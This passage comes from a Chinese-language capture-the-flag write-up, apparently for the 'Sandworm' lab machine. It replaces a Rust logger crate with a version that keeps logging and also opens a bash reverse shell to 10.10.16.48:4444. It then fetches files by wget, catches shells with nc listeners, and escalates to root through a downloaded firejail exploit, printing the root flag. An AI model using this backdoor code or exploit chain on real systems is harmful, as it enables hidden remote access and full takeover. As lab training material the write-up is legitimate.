    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}

需要把 lib.rs修改为我们自己的内容


//Just put the below code in lib.rs

extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

pub fn log(user: &str, query: &str, justification: &str) {
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);

    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
    let sock = TcpStream::connect("10.10.16.48:4444").unwrap();

    // a tcp socket as a raw file descriptor
    // a file descriptor is the number that uniquely identifies an open file in a computer's operating system
    // When a program asks to open a file/other resource (network socket, etc.) the kernel:
    //     1. Grants access
    //     2. Creates an entry in the global file table
    //     3. Provides the software with the location of that entry (file descriptor)
    // https://www.computerhope.com/jargon/f/file-descriptor.htm
    let fd = sock.as_raw_fd();
    // so basically, writing to a tcp socket is just like writing something to a file!
    // the main difference being that there is a client over the network reading the file at the same time!

    Command::new("/bin/bash")
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn()
        .unwrap()
        .wait()
        .unwrap();
}
silentobserver@sandworm:/opt/crates/logger/src$ rm lib.rs 
silentobserver@sandworm:/opt/crates/logger/src$ wget http://10.10.16.48/lib.rs
--2023-06-29 15:38:52--  http://10.10.16.48/lib.rs
Connecting to 10.10.16.48:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1921 (1.9K) [application/rls-services+xml]
Saving to: ‘lib.rs’

lib.rs                                               100%[======================================>]   1.88K  --.-KB/s    in 0.1s    

2023-06-29 15:38:53 (17.3 KB/s) - ‘lib.rs’ saved [1921/1921]

然后使用 nc 监听一个端口

nc -nvlp 4444

然后等待上线就行

┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 36026
bash: cannot set terminal process group (496122): Inappropriate ioctl for device
bash: no job control in this shell
atlas@sandworm:/opt/tipnet$

这次反弹的 shell 比第一个 shell 多了一个 jailer 权限,输入 find 寻找可提权的地方

firejail

atlas@sandworm:/opt/tipnet$ find / -perm -4000 -user root 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
/usr/local/bin/firejail
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/usr/bin/mount
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/su
/usr/bin/fusermount3

https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25

提权可以使用上面的脚本

silentobserver@sandworm:/tmp$ wget http://10.10.16.48/exploit.py
--2023-06-29 15:45:08--  http://10.10.16.48/exploit.py
Connecting to 10.10.16.48:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7955 (7.8K) [text/x-python]
Saving to: ‘exploit.py’

exploit.py                                           100%[===========================================>]   7.77K  40.9KB/s    in 0.2s    

2023-06-29 15:45:10 (40.9 KB/s) - ‘exploit.py’ saved [7955/7955]

silentobserver@sandworm:/tmp$ chmod +x exploit.py

上传到 /tmp 目录,并给执行权限

┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 5555 
listening on [any] 5555 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 33806
bash: cannot set terminal process group (1608): Inappropriate ioctl for device
bash: no job control in this shell
atlas@sandworm:/opt/tipnet$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
atlas@sandworm:/opt/tipnet$ cd /tmp
cd /tmp
atlas@sandworm:/tmp$ python3 exploit.py
python3 exploit.py
You can now run 'firejail --join=1776' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

执行脚本,然后再开一个 shell,去执行脚本给我们的 firejail --join=1776

┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 57828
bash: cannot set terminal process group (1833): Inappropriate ioctl for device
bash: no job control in this shell
atlas@sandworm:/opt/tipnet$ firejail --join=1776
firejail --join=1776
Warning: cleaning all supplementary groups
changing root to /proc/1776/root
Child process initialized in 9.03 ms
su -
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

成功提权到 root

cat /root/root.txt
e24cdfa390562eed1f0d97513bbf8db4

成功拿到 root 权限的 flag 文件